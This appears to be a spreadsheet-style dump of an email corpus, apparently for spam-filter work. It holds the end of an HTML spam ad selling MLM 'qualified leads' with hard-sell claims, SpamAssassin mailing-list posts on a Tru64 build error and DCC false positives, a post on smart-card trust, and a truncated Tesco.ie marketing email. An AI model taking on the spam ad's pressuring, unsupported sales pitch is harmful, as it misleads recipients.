 &lt;b&gt;Benefits of our Phone Qualified Lead Generation System:&lt;br&gt;&lt;br&gt;
 &lt;/b&gt;1. They will be &lt;b&gt;Extremely Qualified&lt;/b&gt; due to the nature of the &lt;br&gt;
 qualifying questions that will be asked (above).&lt;br&gt;&lt;br&gt;
 2. They are &lt;b&gt;Super-Fresh!&lt;/b&gt;&amp;nbsp; Delivered in Real-Time only &lt;b&gt;moments &lt;br&gt;
 &lt;/b&gt;after they are contacted and qualified!&amp;nbsp; (Not 30-120 days old)&lt;br&gt;&lt;br&gt;
 3. They're &lt;b&gt;Targeted.&lt;/b&gt;&amp;nbsp; Each Lead we generate originates from a&lt;br&gt;
 targeted list of business opportunity seekers.&lt;br&gt;&lt;br&gt;
 4. They're &lt;b&gt;Highly Receptive!&lt;/b&gt;&amp;nbsp; &lt;b&gt;Receptivity is very, very high&lt;/b&gt; &lt;br&gt;
 because they &lt;b&gt;aren't bombarded by tons of people pitching &lt;br&gt;
 them on opportunities!&lt;/b&gt;&amp;nbsp; Also they'll remember speaking to &lt;br&gt;
 someone over the phone.&amp;nbsp; Especially since &lt;b&gt;we tell them to &lt;br&gt;
 expect your call!&lt;br&gt;&lt;br&gt;
 &lt;/b&gt;5. &lt;b&gt;No &amp;quot;feast or famine&amp;quot;&lt;/b&gt; activity.&amp;nbsp; Leads will be coming in &lt;br&gt;
 regularly.&amp;nbsp; You dictate the flow!&lt;br&gt;&lt;br&gt;
 6. &lt;b&gt;No more cold calls!&amp;nbsp; &lt;/b&gt;We tell your prospects you'll be calling.&lt;br&gt;&lt;br&gt;
 7. You can &lt;b&gt;*personalize* your approach&lt;/b&gt; with the info. you &lt;br&gt;
 get with each Lead!&lt;br&gt;&lt;br&gt;
 8. &lt;b&gt;Save Time.&amp;nbsp; &lt;/b&gt;Naturally, better Leads means less calls to get a sale.&lt;br&gt;&lt;br&gt;
 9. &lt;b&gt;Lower &amp;quot;burnout&amp;quot; factor.&lt;/b&gt;&amp;nbsp; Calling red-hot Leads makes it easier &lt;br&gt;
 to pick up the phone, day in and day out.&lt;br&gt;&lt;br&gt;
 10. You can &lt;b&gt;sort your Leads&lt;/b&gt; based on their responses and call the&lt;br&gt;
 hottest ones first.&lt;br&gt;&lt;br&gt;
 11. You can &lt;b&gt;get new reps started quicker&lt;/b&gt; using these Leads due &lt;br&gt;
 to &lt;b&gt;higher closing ratios&lt;/b&gt;.&amp;nbsp; Of course, this builds faster and stronger &lt;br&gt;
 momentum, and skyrockets &amp;quot;new rep retention&amp;quot; as a result of &lt;br&gt;
 &amp;quot;quick successes&amp;quot;.&lt;br&gt;&lt;br&gt;
 12. The &lt;b&gt;Leads will be uniform &lt;/b&gt;- almost all leads will have the info. &lt;br&gt;
 indicated above. (All leads will have valid phone numbers.)&lt;br&gt;&lt;br&gt;
 13. They're &lt;b&gt;double-qualified&lt;/b&gt; because to generate the Lead, &lt;br&gt;
 a list of previous business opportunity seekers is used.&lt;br&gt;&lt;br&gt;
 14. Excellent &lt;b&gt;control of the flow of Leads&lt;/b&gt; coming through.&lt;br&gt;&lt;br&gt;
 If you've been trying to run things too long without a &lt;u&gt;steady flow&lt;/u&gt; of high&lt;br&gt;
 quality leads, call us &lt;i&gt;&lt;u&gt;NOW&lt;/u&gt;&lt;/i&gt; to get things in motion.&amp;nbsp; Just let us know &lt;br&gt;
 what program you want to advertise and we'll create a customized &lt;br&gt;
 lead-generation campaign for you. &lt;br&gt;&lt;br&gt;
 Since your need to get business moving has probably never been &lt;br&gt;
 more critical than it is today, why not call us &lt;b&gt;&lt;u&gt;NOW!&lt;br&gt;&lt;br&gt;
 &lt;/u&gt;&lt;/b&gt;These are &lt;b&gt;&lt;i&gt;&lt;u&gt;fresh, highly qualified leads&lt;/u&gt;&lt;/i&gt;&lt;/b&gt; because these people aren't &lt;br&gt;
 just responding to some &amp;quot;Generic Business Opportunity&amp;quot; ad, they're &lt;br&gt;
 contacted &lt;b&gt;over the phone specifically&lt;/b&gt; for &lt;b&gt;&lt;u&gt;YOUR&lt;/u&gt;&lt;/b&gt; company!&amp;nbsp; And we &lt;br&gt;
 forward you the leads within &lt;b&gt;&lt;u&gt;minutes&lt;/u&gt;&lt;/b&gt; of the lead being generated - not &lt;br&gt;
 days, weeks, or months!&lt;br&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;div align="center"&gt;&lt;font size=4&gt;Start Generating As Many &lt;b&gt;SIGN-UPS&lt;/b&gt; as You Can Handle!&lt;br&gt;
 Explode Your Downline and Income!&lt;br&gt;&lt;br&gt;
 &lt;/font&gt;&lt;font size=5&gt;&lt;b&gt;Call For Details and Discount Pricing!&lt;br&gt;
 Toll Free &lt;u&gt;1-866-853-8319&lt;/u&gt; ext.1&lt;br&gt;&lt;br&gt;
 &lt;/b&gt;&lt;/font&gt;&lt;font size=4&gt;Or &lt;a href="mailto:bestmlmleads1@btamail.net.cn?subject=Phone Leads&amp;body=Please type your Name, Phone Number and Best time to call.  All info is held strictly confidential.  Thank you!"&gt;email us here&lt;/a&gt; for full details&lt;br&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/div&gt;
 To opt out &lt;/font&gt;&lt;a href="mailto:optout723@btamail.net.cn"&gt;&lt;font size=4 color="#0000FF"&gt;&lt;u&gt;Click Here&lt;br&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;/a&gt;&lt;/font&gt;&lt;/u&gt;&lt;/html&gt;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</si>
  <si>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 [SAtalk] Tru64 compile of SA
</t>
  </si>
  <si>
    <t xml:space="preserve">
 On Thu, 29 Aug 2002, Rick Beebe wrote:
 &gt; &gt; cc: Error: spamd/spamc.c, line 50: In this declaration, "in_addr_t" has no
 &gt; &gt; linka
 &gt; &gt; ge and has a prior declaration in this scope at line number 572 in file
 &gt; &gt; /usr/inc
 &gt; &gt; lude/sys/types.h. (nolinkage)
 &gt; &gt; typedef unsigned long   in_addr_t;      /* base type for internet address
 &gt; &gt; */
 &gt;
 &gt; Don't worry about the warnings. To fix the error, edit spamc.c and right
    Thanks for posting this tip - I had the same problem compiling with
 Tru64 and that took care of it.
    When I did the "make install" I got this error:
 LOCK:  -f /etc/mail/spamassassin/local.cf
  || cp rules/local.cf /etc/mail/spamassassin/local.cf
 sh: syntax error at line 1: `||' unexpected
 *** Exit 2
 Stop.
    It appears that this comes from the "inst_cfs:" part of the Makefile,
 which copies local.cf into /etc/mail/spamassassin.  The Makefile has
 brackets around the -f test, but they don't show up above.  Any ideas?
 Jim
 *-------------------------------------------------------------------------*
 * James H. McCullars                 I Phone: (256) 824-2610              *
 * Director of Systems &amp; Operations   I Fax:   (256) 824-6643              *
 * Computer &amp; Network Services        I Internet: mccullj@email.uah.edu    *
 * The University of Alabama          I -----------------------------------*
 *    in Huntsville                   I                                    *
 * Huntsville, AL 35899               I This space for rent - CHEAP!       *
 *-------------------------------------------------------------------------*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</si>
  <si>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[SAtalk] Is DCC for real?
</t>
  </si>
  <si>
    <t xml:space="preserve">So far today, I've found eff.org and mandrakesoft.com in DCC.  My confidence 
 in DCC is beginning to drop.
 -- 
 Robin Lynn Frank
 Paradigm-Omega, LLC
 ==================================
 No electrons were harmed in the sending
 of this message.  However, two neutrons and 
 a proton complained about the noise.
 -------------------------------------------------------
 In remembrance
 www.osdn.com/911/
 _______________________________________________
 Spamassassin-talk mailing list
 Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Secure Sofware Key
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Sep 03, 2002 at 09:03:40PM -0400, Yannick Gingras wrote:
 &gt; This make me wonder about the relative protection of smart cards.  They have 
 &gt; an internal procession unit around 4MHz.  Can we consider them as trusted 
 &gt; hardware ?  The ability to ship smart cards periodicaly uppon cashing of a 
 &gt; monthly subscription fee would not raise too much the cost of "renting" the 
 &gt; system.  Smart card do their own self encryption.  Can they be used to 
 &gt; decrypt data needed by the system ?  The input of the system could me mangled 
 &gt; and the would keep a reference of how long it was in service.
 &gt; 
 &gt; This sounds really feasible but I may be totaly wrong.  I may also be wrong 
 &gt; about the safety of a smart card.  
 &gt; 
 &gt; What do you think ?
 That's similar to using hard-locks (either the old parallel, or the new
 usb).
 The problem is that that piece of hardware is trustworthy, but the rest of
 the PC isn't, so a cracker just needs to simulate the lock/smart card, or
 peek at the executable after the lock has been deactivated.
 Regards,
 Luciano Rocha
 -- 
 Consciousness: that annoying time between naps.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Quicker and easier shopping with Tesco.
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_Part_90740_3115243.1036431255782
 Content-Type: text/plain; charset=ISO-8859-1
 Content-Transfer-Encoding: 7bit
 Content-Description: This is text version of an eMessage
 unsubscribe
 http://www.tesco.ie/register/unsubscribe.asp?from=jm@jmason.org 
 ========================================================================
 ----------------------------- MESSAGE LINKS ----------------------------
 ========================================================================
 To view this message in HTML format (pictures as well as text), follow this link or alternatively copy and paste the link into your browser: 
 &lt;http://www.twelvehorses.com/S/FQXLU/DW3YV/FQV1Z/9141ZD2V/M/&gt;
 To unsubscribe from this service, follow this link or alternatively copy and paste the link into your browser:
 &lt;http://www.twelvehorses.com/S/FQXLU/DW3YV/FQV1Z/9141ZD2V/U/&gt;
 ========================================================================
 ------=_Part_90740_3115243.1036431255782
 Content-Type: text/html; charset=ISO-8859-1
 Content-Transfer-Encoding: quoted-printable
 Content-Description: This is a full eMessage
 &lt;!--
 You have just received an HTML-rich eMessage that cannot be displayed by yo=
 ur email software. You may view this message online with your internet brow=
 ser by following this link:
 http://www.twelvehorses.com/S/FQXLU/DW3YV/FQV1Z/9141ZD2V/M/
 Alternatively, you may copy and paste this link into your internet browser.
 --&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;&lt;TITLE&gt;Quicker and easier shopping with Tesco.&lt;/TITLE&gt;&lt;/HEAD&gt;
 &lt;BODY BGCOLOR=3D"#183C8C" TEXT=3D"#183C8C" LINK=3D"#183C8C" VLINK=3D"#183C8=
 C" ALINK=3D"#183C8C"&gt;
 &lt;MAP NAME=3D"topmap"&gt;&lt;area shape=3Drect coords=3D"2,2,552,123" href=3D"http=
 ://www.twelvehorses.com/mm/Clickthrough/26447543/26450850/23333143/5NGp6tsc=
 iMBWBAxvERCbPMC.NjgA/*http://www.tesco.ie"&gt;&lt;/MAP&gt;
 &lt;TABLE ID=3D"maincell" WIDTH=3D556 BORDER=3D0 CELLSPACING=3D0 CELLPADDING=
 =3D0&gt;
 &lt;TR WIDTH=3D556 HEIGHT=3D1&gt;&lt;TD COLSPAN=3D1&gt;&lt;IMG ALT=3D"You have just receiv=
 ed an HTML-rich eMessage that cannot be displayed by your email software. Y=
 ou may view this message online with your internet browser by following thi=
 s link:http://www.twelvehorses.com/S/FQXLU/DW3YV/FQV1Z/9141ZD2V/M/" HEIGHT=
 =3D1 WIDTH=3D1 BORDER=3D0&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR WIDTH=3D556 HEIGHT=3D1&gt;&lt;TD COLSPAN=3D1&gt;&lt;IMG ALT=3D" " HEIGHT=3D1 WIDTH=
 =3D1 BORDER=3D0&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR WIDTH=3D556 HEIGHT=3D1&gt;&lt;TD COLSPAN=3D1&gt;&lt;IMG ALT=3D" " HEIGHT=3D1 WIDTH=
 =3D1 BORDER=3D0&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR WIDTH=3D556 HEIGHT=3D1&gt;&lt;TD COLSPAN=3D1&gt;&lt;IMG ALT=3D" " HEIGHT=3D1 WIDTH=
 =3D1 BORDER=3D0&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR WIDTH=3D556 HEIGHT=3D1&gt;&lt;TD COLSPAN=3D1&gt;&lt;IMG ALT=3D" " HEIGHT=3D1 WIDTH=
 =3D1 BORDER=3D0&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR WIDTH=3D556 HEIGHT=3D1&gt;&lt;TD COLSPAN=3D1&gt;&lt;IMG ALT=3D" " HEIGHT=3D1 WIDTH=
 =3D1 BORDER=3D0&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR ID=3D"topbanner" WIDTH=3D556&gt;&lt;TD WIDTH=3D556 HEIGHT=3D128 COLSPAN=3D1 A=
 LIGN=3DLEFT BGCOLOR=3D"#FFFFFF" VALIGN=3DBOTTOM &gt;&lt;A NAME=3D"top"&gt;&lt;/A&gt;&lt;IMG S=
 RC=3D"http://www.twelvehorses.com/mm/WrapperImage/26447543/W_Top" USEMAP=3D=
 "#topmap" BORDER=3D0  WIDTH=3D556 HEIGHT=3D128 ALT=3D" "&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR ID=3D"middlerow" WIDTH=3D556&gt;&lt;TD ID=3D"textcell" ALIGN=3DLEFT VALIGN=3D=
 TOP WIDTH=3D556 HEIGHT=3D0 BGCOLOR=3D"#183C8C"&gt;&lt;TABLE ID=3D"netscapespacer"=
  WIDTH=3D556 HEIGHT=3D0 CELLSPACING=3D0 CELLPADDING=3D5 BORDER=3D0&gt;&lt;TR&gt;&lt;TD =
 WIDTH=3D556 HEIGHT=3D0 ALIGN=3DLEFT VALIGN=3DTOP&gt;&lt;FONT COLOR=3D"#183C8C" FA=
 CE=3D"Arial,Helvetica,sans-serif" SIZE=3D2&gt;&lt;tr&gt;&lt;table width=3D"556" border=
 =3D"0" cellspacing=3D"0" cellpadding=3D"0" bgcolor=3D"#FFFFFF"&gt;   &lt;tr&gt;     =
  &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"486"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td wid=
 th=3D"35"&gt;&amp;nbsp;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;     =
 &lt;td width=3D"486"&gt;        &lt;p&gt;&lt;font size=3D"2" face=3D"Verdana, Arial, Helve=
 tica, sans-serif"&gt;&lt;b&gt;Dear Mr Mason,&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;       &lt;p&gt;&lt;font size=3D"1=
 " face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;We know how          impor=
 tant it is that shopping online is both quick and easy, that's why         =
  we've introduced a number of changes and improvements to make our site    =
       easier to use - and your life easier. Here's a quick guide:&lt;/font&gt;&lt;/p=
 &gt;       &lt;ul&gt;         &lt;li&gt;&lt;font size=3D"1" face=3D"Verdana, Arial, Helvetica=
 , sans-serif"&gt;Special            offers are easier to spot and access&lt;/font=
 &gt;&lt;/li&gt;         &lt;li&gt;&lt;font size=3D"1" face=3D"Verdana, Arial, Helvetica, sans=
 -serif"&gt;'Search'            has been improved to make finding what you want=
  easier&lt;/font&gt;&lt;/li&gt;         &lt;li&gt;&lt;font size=3D"1" face=3D"Verdana, Arial, He=
 lvetica, sans-serif"&gt;We've            sped up the site to make shopping eas=
 ier&lt;/font&gt;&lt;/li&gt;         &lt;li&gt;&lt;font size=3D"1" face=3D"Verdana, Arial, Helvet=
 ica, sans-serif"&gt;We've            made it easier to tell your personal shop=
 per what you want &lt;/font&gt;&lt;/li&gt;       &lt;/ul&gt;     &lt;/td&gt;     &lt;td width=3D"35"&gt;&amp;=
 nbsp;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;td width=3D"35" height=3D"1"&gt;&lt;img src=3D"ht=
 tp://www.12hs.com/images/tesco/8/space.gif" width=3D"1" height=3D"1"&gt;&lt;/td&gt; =
     &lt;td width=3D"486" bgcolor=3D"#4AA6E7" height=3D"1"&gt;&lt;img src=3D"http://w=
 ww.12hs.com/images/tesco/8/space.gif" width=3D"1" height=3D"1"&gt;&lt;/td&gt;     &lt;t=
 d width=3D"35" height=3D"1"&gt;&lt;img src=3D"http://www.12hs.com/images/tesco/8/=
 space.gif" width=3D"1" height=3D"1"&gt;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;td width=3D"=
 35"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"486"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"35"&gt;&amp;nbs=
 p;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"4=
 86"&gt;        &lt;table width=3D"486" border=3D"0" cellspacing=3D"0" cellpadding=
 =3D"0"&gt;         &lt;tr&gt;            &lt;td valign=3D"top" width=3D"50%"&gt;          =
     &lt;p&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2"&gt;&lt;b&gt;N=
 ew                intelligent Search&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;             &lt;p&gt;&lt;font fa=
 ce=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;b&gt;=95             =
    We=92ve improved =91Search=92 to make it much easier to find exactly wha=
 t                you=92re looking for.&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;             &lt;p&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"1"&gt;Here=92s         =
        an example of the improved search results you=92ll see if you typed =
                in =91bread=92.&lt;/font&gt;&lt;font face=3D"Verdana, Arial, Helvetic=
 a, sans-serif" size=3D"2"&gt;                &lt;/font&gt;&lt;/p&gt;           &lt;/td&gt;      =
      &lt;td valign=3D"top" width=3D"50%" align=3D"right"&gt;&lt;img src=3D"http://ww=
 w.12hs.com/images/tesco/8/map1.gif" width=3D"230" height=3D"160"&gt;&lt;/td&gt;     =
     &lt;/tr&gt;       &lt;/table&gt;     &lt;/td&gt;     &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;   &lt;/tr&gt;=
    &lt;tr&gt;      &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"486" align=3D"ri=
 ght"&gt;&lt;img src=3D"http://www.12hs.com/images/tesco/8/map2.gif" width=3D"484"=
  height=3D"68"&gt;&lt;/td&gt;     &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;=
 td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"486"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=
 =3D"35"&gt;&amp;nbsp;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;td width=3D"35" height=3D"1"&gt;&lt;img =
 src=3D"http://www.12hs.com/images/tesco/8/space.gif" width=3D"1" height=3D"=
 1"&gt;&lt;/td&gt;     &lt;td width=3D"486" bgcolor=3D"#4AA6E7" height=3D"1"&gt;&lt;img src=3D=
 "http://www.12hs.com/images/tesco/8/space.gif" width=3D"1" height=3D"1"&gt;&lt;/t=
 d&gt;     &lt;td width=3D"35" height=3D"1"&gt;&lt;img src=3D"http://www.12hs.com/images=
 /tesco/8/space.gif" width=3D"1" height=3D"1"&gt;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;td =
 width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"486"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D=
 "35"&gt;&amp;nbsp;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td w=
 idth=3D"486"&gt;        &lt;p&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif=
 " size=3D"2"&gt;&lt;b&gt;Speedier          service&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;       &lt;p&gt;&lt;b&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"1"&gt;=95 Waiting      =
     for the site to download is not how you want to spend your time, so we=
 =92ve          speeded up the site to make shopping quicker.&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;=
      &lt;/td&gt;     &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;td width=
 =3D"35"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"486"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"35"&gt;=
 &amp;nbsp;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;td width=3D"35" height=3D"1"&gt;&lt;img src=3D"h=
 ttp://www.12hs.com/images/tesco/8/space.gif" width=3D"1" height=3D"1"&gt;&lt;/td&gt;=
      &lt;td width=3D"486" bgcolor=3D"#4AA6E7" height=3D"1"&gt;&lt;img src=3D"http://=
 www.12hs.com/images/tesco/8/space.gif" width=3D"1" height=3D"1"&gt;&lt;/td&gt;     &lt;=
 td width=3D"35" height=3D"1"&gt;&lt;img src=3D"http://www.12hs.com/images/tesco/8=
 /space.gif" width=3D"1" height=3D"1"&gt;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;td width=3D=
 "35"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"486"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"35"&gt;&amp;nb=
 sp;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"=
 486"&gt;        &lt;table width=3D"486" border=3D"0" cellspacing=3D"0" cellpaddin=
 g=3D"0"&gt;         &lt;tr&gt;            &lt;td rowspan=3D"2" width=3D"214" valign=3D"=
 bottom"&gt;&lt;img src=3D"http://www.12hs.com/images/tesco/8/map3.gif" width=3D"2=
 14" height=3D"144"&gt;&lt;/td&gt;           &lt;td&gt;              &lt;table width=3D"260" b=
 order=3D"0" cellspacing=3D"0" cellpadding=3D"0" align=3D"right"&gt;           =
     &lt;tr&gt;                  &lt;td&gt;                    &lt;p&gt;&lt;font face=3D"Verdana,=
  Arial, Helvetica, sans-serif" size=3D"2"&gt;&lt;b&gt;Take                      note=
 &lt;/b&gt;&lt;/font&gt;&lt;/p&gt;                   &lt;p&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, Helve=
 tica, sans-serif" size=3D"1"&gt;=95                      We=92ve made it easie=
 r for you to tell your Personal Shopper                      exactly what y=
 ou want; for example green bananas.&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;                   &lt;p&gt;&lt;fo=
 nt face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"1"&gt;Here=92s      =
                 where you=92ll be able to =91add notes=92.&lt;/font&gt;&lt;/p&gt;      =
            &lt;/td&gt;               &lt;/tr&gt;             &lt;/table&gt;           &lt;/td&gt;  =
        &lt;/tr&gt;         &lt;tr&gt;            &lt;td&gt;&lt;img src=3D"http://www.12hs.com/im=
 ages/tesco/8/map4.gif" width=3D"239" height=3D"52"&gt;&lt;/td&gt;         &lt;/tr&gt;     =
   &lt;/table&gt;     &lt;/td&gt;     &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;=
 td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"486"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=
 =3D"35"&gt;&amp;nbsp;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;td width=3D"35" height=3D"1"&gt;&lt;img =
 src=3D"http://www.12hs.com/images/tesco/8/space.gif" width=3D"1" height=3D"=
 1"&gt;&lt;/td&gt;     &lt;td width=3D"486" bgcolor=3D"#4AA6E7" height=3D"1"&gt;&lt;img src=3D=
 "http://www.12hs.com/images/tesco/8/space.gif" width=3D"1" height=3D"1"&gt;&lt;/t=
 d&gt;     &lt;td width=3D"35" height=3D"1"&gt;&lt;img src=3D"http://www.12hs.com/images=
 /tesco/8/space.gif" width=3D"1" height=3D"1"&gt;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;td =
 width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"486"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D=
 "35"&gt;&amp;nbsp;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td w=
 idth=3D"486"&gt;        &lt;p&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif=
 " size=3D"2"&gt;&lt;b&gt;Did you          know?&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;       &lt;p&gt;&lt;b&gt;&lt;font fac=
 e=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"1"&gt;=95 Our          Per=
 sonal Shoppers choose your shopping with the same care you would&lt;/font&gt;&lt;/b&gt;=
 &lt;br&gt;         &lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" size=
 =3D"1"&gt;=95 You can          check if a delivery slot is available before yo=
 u shop online&lt;/font&gt;&lt;/b&gt;&lt;br&gt;         &lt;b&gt;&lt;font face=3D"Verdana, Arial, Helve=
 tica, sans-serif" size=3D"1"&gt;=95 Refrigerated          vans keep your groce=
 ries in tip-top condition until they arrive with you&lt;/font&gt;&lt;/b&gt;&lt;br&gt;        =
  &lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"1"&gt;=95 You=
 r          credit/laser card information is secure with tesco.ie &lt;/font&gt;&lt;/b=
 &gt;&lt;/p&gt;     &lt;/td&gt;     &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;td wi=
 dth=3D"35"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"486"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"3=
 5"&gt;&amp;nbsp;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;td width=3D"35" height=3D"1"&gt;&lt;img src=
 =3D"http://www.12hs.com/images/tesco/8/space.gif" width=3D"1" height=3D"1"&gt;=
 &lt;/td&gt;     &lt;td width=3D"486" bgcolor=3D"#4AA6E7" height=3D"1"&gt;&lt;img src=3D"ht=
 tp://www.12hs.com/images/tesco/8/space.gif" width=3D"1" height=3D"1"&gt;&lt;/td&gt; =
     &lt;td width=3D"35" height=3D"1"&gt;&lt;img src=3D"http://www.12hs.com/images/te=
 sco/8/space.gif" width=3D"1" height=3D"1"&gt;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;td wid=
 th=3D"35"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"486"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"35=
 "&gt;&amp;nbsp;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td widt=
 h=3D"486"&gt;        &lt;p&gt;&lt;font size=3D"1" face=3D"Verdana, Arial, Helvetica, sa=
 ns-serif"&gt;Any problems          with your online grocery shopping? Just cal=
 l 00 800 00 225533*&lt;/font&gt;&lt;/p&gt;       &lt;p&gt;&lt;font size=3D"1" face=3D"Verdana, A=
 rial, Helvetica, sans-serif"&gt;We hope these          changes make shopping o=
 nline quicker and even more convenient, &lt;a href=3D"http://www.tesco.ie"&gt;&lt;b&gt;=
 logon          to tesco.ie today&lt;/b&gt;&lt;/a&gt;.&lt;/font&gt;&lt;/p&gt;       &lt;table width=3D"=
 486" border=3D"0" cellspacing=3D"0" cellpadding=3D"0"&gt;         &lt;tr&gt;        =
     &lt;td valign=3D"top"&gt;              &lt;p&gt;&lt;font size=3D"1" face=3D"Verdana, A=
 rial, Helvetica, sans-serif"&gt;Best                wishes&lt;/font&gt;&lt;/p&gt;         =
     &lt;p&gt;&lt;font size=3D"2" face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;Tesc=
 o.ie                &lt;/font&gt;&lt;/p&gt;           &lt;/td&gt;           &lt;td align=3D"righ=
 t"&gt;&lt;img src=3D"http://www.12hs.com/images/tesco/8/fruit_base.jpg" width=3D"=
 301" height=3D"100"&gt;&lt;/td&gt;         &lt;/tr&gt;       &lt;/table&gt;     &lt;/td&gt;     &lt;td wi=
 dth=3D"35"&gt;&amp;nbsp;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;    =
  &lt;td width=3D"486"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;   &lt;/tr&gt;   &lt;=
 tr&gt;      &lt;td width=3D"35" height=3D"1"&gt;&lt;img src=3D"http://www.12hs.com/imag=
 es/tesco/8/space.gif" width=3D"1" height=3D"1"&gt;&lt;/td&gt;     &lt;td width=3D"486" =
 bgcolor=3D"#4AA6E7" height=3D"1"&gt;&lt;img src=3D"http://www.12hs.com/images/tes=
 co/8/space.gif" width=3D"1" height=3D"1"&gt;&lt;/td&gt;     &lt;td width=3D"35" height=
 =3D"1"&gt;&lt;img src=3D"http://www.12hs.com/images/tesco/8/space.gif" width=3D"1=
 " height=3D"1"&gt;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;     &lt;=
 td width=3D"486"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr=
